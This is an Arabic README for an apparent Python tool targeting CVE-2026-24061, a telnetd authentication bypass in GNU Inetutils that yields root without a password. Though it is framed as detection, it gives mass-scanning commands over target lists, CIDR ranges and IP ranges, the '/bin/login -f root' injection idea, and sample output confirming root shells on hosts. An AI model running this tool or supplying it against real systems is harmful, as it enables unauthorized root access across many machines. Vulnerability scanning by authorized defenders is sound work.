
GNU Inetutils telnet ثغرة تجاوز المصادقة عن بُعد (CVE-2026-24061)، تنبع هذه الثغرة من المعالجة غير السليمة لمتغيرات البيئة في مكوّن telnetd الخاص بـ GNU Inetutils، حيث يمكن للمهاجم استغلال هذه الثغرة عبر إنشاء متغير بيئة USER خبيث وإرساله إلى خدمة telnet المتأثرة، مما يؤدي إلى تفعيل آلية تجاوز المصادقة، وبالتالي الحصول على صلاحيات الجذر (root) مباشرة دون الحاجة إلى كلمة مرور.
هذه أداة اكتشاف متقدمة لتجاوز المصادقة في GNU Inetutils Telnetd (CVE-2026-24061). تبلغ درجة CVSS لهذه الثغرة 9.8، ويمكن للمهاجم من خلالها الحصول على صلاحيات root دون مصادقة عبر حقن متغيرات البيئة.
# دعم الألوان على أنظمة Windows
pip install colorama
python3 CVE-2026-24061.py 192.168.1.1
# إنشاء ملف الأهداف
echo "192.168.1.1" > targets.txt
echo "192.168.1.2" >> targets.txt
echo "192.168.1.3" >> targets.txt
# تنفيذ الفحص الجماعي
python3 CVE-2026-24061.py -f targets.txt
# تحديد المنفذ وعدد الخيوط
python3 CVE-2026-24061.py -f targets.txt -p 23 -t 50
# الوضع التفصيلي وحفظ النتائج
python3 CVE-2026-24061.py -f targets.txt -o results.txt -v
# تخصيص مهلة الانتظار
python3 CVE-2026-24061.py -f targets.txt -T 10
| الحالة | المؤشر | اللون | الوصف |
|---|---|---|---|
| تأكيد الثغرة | ✓ | 🔴 أحمر | تم اكتشاف كل من uid=0 و gid=0 |
| مشبوه بدرجة عالية | ⚠ | 🟡 أصفر | تم اكتشاف uid=0 ومستخدم root |
| يحتاج تأكيد | ? | 🔵 سماوي | تم اكتشاف uid=0 فقط، يتطلب تحققًا يدويًا |
| آمن | ✗ | 🟢 أخضر | لم يتم اكتشاف خصائص الثغرة |
| فشل الاتصال | ✗ | ⚪ رمادي | مشكلة في الاتصال بالشبكة |
[✓ تأكيد الثغرة] [14:30:25] 192.168.1.1:23 └─ تأكيد الثغرة | uid=0/gid=0 | الشعار: Ubuntu 20.04
[⚠ مشبوه بدرجة عالية] [14:30:26] 192.168.1.2:23 └─ مشبوه بدرجة عالية | uid=0 + root | الشعار: Debian 12
[? يحتاج تأكيد] [14:30:27] 192.168.1.3:23 └─ تم اكتشاف uid=0 ولكن تفتقر شروط التأكيد الأخرى
| المعامل | الاختصار | القيمة الافتراضية | الوصف |
|---|---|---|---|
--file | -f | - | مسار ملف الأهداف |
--port | -p | 23 | منفذ الهدف |
--threads | -t | 50 | عدد الخيوط المتزامنة |
--timeout | -T | 8 | مهلة الانتظار لكل هدف (بالثواني) |
--output | -o | - | ملف إخراج النتائج |
--verbose | -v | False | وضع الإخراج التفصيلي |
--user | -u | root | اسم مستخدم المصادقة |
يدعم ملف الأهداف التنسيقات التالية: 192.168.1.1 192.168.1.2:2323 # تحديد المنفذ 192.168.1.0/24 # تنسيق CIDR 10.0.0.1-10.0.0.10 # نطاق IP
تستغل هذه الثغرة الخلل في معالجة GNU Inetutils Telnetd لمتغيرات البيئة:
/bin/login -f root# شروط الاكتشاف المتعددة
uid_0_detected = "uid=0" in response_text
gid_0_detected = "gid=0" in response_text
root_detected = "root" in response_text
# منطق تأكيد الثغرة
if uid_0_detected and gid_0_detected:
return "تأكيد الثغرة"
elif uid_0_detected and root_detected:
return "مشبوه بدرجة عالية"
elif uid_0_detected:
return "يحتاج تأكيد"
·


